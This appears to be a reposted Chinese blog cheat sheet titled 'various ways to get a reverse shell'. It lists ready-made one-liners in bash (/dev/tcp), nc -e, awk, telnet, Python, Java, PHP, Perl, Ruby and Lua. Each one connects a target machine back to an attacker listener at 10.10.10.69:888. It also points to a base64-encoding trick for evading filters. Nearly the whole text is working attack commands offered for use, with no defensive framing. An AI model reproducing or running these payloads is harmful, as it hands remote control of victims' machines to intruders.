欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

反弹shell的各种姿势

程序员文章站 2022-07-07 19:31:31
...

前言:攻击机器IP10.10.10.69,监听端口888,反弹命令均在目标机器上执行

nc -lvp 888

1、bash反弹

bash -i >& /dev/tcp/10.10.10.69/888 0>&1

base64编码绕过:http://www.jackson-t.ca/runtime-exec-payloads.html

2、nc反弹

nc -e /bin/bash 10.10.10.69 888

3、awk反弹

awk 'BEGIN{s="/inet/tcp/0/10.10.10.69/888";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

4、telnet反弹
需在攻击监听两个端口,比如888和999端口,执行反弹shell命令后,在888终端输入命令,999终端查看命令执行后的结果
攻击机执行命令:

nc -lvp 888
nc -lvp 999

目标机执行命令:

telnet 10.10.10.69 888 | /bin/bash | telnet 10.10.10.69 999

5、Python反弹

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.69',888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

6、Java反弹

public class Test {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.69/888;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

保存为Test.java,编译执行,成功反弹shell

javac Test.java
java Test

7、PHP反弹

php -r '$sock=fsockopen("10.10.10.69",888);exec("/bin/sh -i <&3 >&3 2>&3");'

8、Perl反弹

perl -e 'use Socket;$i="10.10.10.69";$p=888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

9、Ruby反弹

ruby -rsocket -e'f=TCPSocket.open("10.10.10.69",888).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

10、Lua反弹

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.10.69','888');os.execute('/bin/sh -i <&3 >&3 2>&3');"